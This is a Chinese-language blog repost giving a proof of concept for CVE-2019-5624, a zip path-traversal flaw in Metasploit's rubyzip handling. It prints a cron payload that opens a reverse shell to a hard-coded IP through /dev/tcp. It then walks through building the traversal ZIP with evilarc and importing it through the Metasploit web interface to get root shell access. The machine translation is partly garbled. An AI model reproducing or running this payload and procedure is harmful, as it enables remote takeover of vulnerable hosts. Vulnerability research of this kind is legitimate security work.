首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Metasploit RCE CVE-2019-5624

Metasploit RCE CVE-2019-5624

作者头像
洛米唯熊
发布2019-07-25 15:11:09
发布2019-07-25 15:11:09
52600
代码可运行
举报
文章被收录于专栏:洛米唯熊洛米唯熊
运行总次数:0
代码可运行

CVE - 5624 - 2019

概念证明的 metasploit 的漏洞 CVE - 2019 - 5624 (RCE) 处理不安全的 zip rubyzip

Intro

在 2019 年 2 月我发现新漏洞在 rubyzip 图书馆。它允许攻击者利用不安全的 zip (处理滑动拉链) 导致远程命令执行。

此漏洞被利用到所有目标 metasploit < 5.0 版本. 18metasploit 总结

PoC

  • 创建文件的下列内容 :
代码语言:javascript
代码运行次数:0
运行
复制
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • 生成 ZIP 档案路径遍历净荷 :
代码语言:javascript
代码运行次数:0
运行
复制
python evilarc.py exploit --os unix -p etc/cron.d/
  • 请添加一个有效的 ZIP 文件到工作区 MSF (MSF 为提取它 , 否则它将拒绝处理 zip 存档)
  • 设置两个接收器 , 一个端口与其它端口 4444 上的一个端口 (4445 4445 会反向壳)
  • MSF 在登录 Web 接口
  • 创建一个新的 “项目”
  • 选择 “导入” 、 “来自文件” , 选择了与邪恶的 ZIP 文件 , 最后点击 “导入” 按钮
  • 等待导入进程完成
  • 享受你的反向壳

开源地址:https://github.com/VoidSec/CVE-2019-5624/

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-05-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • CVE - 5624 - 2019
    • Intro
    • PoC
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档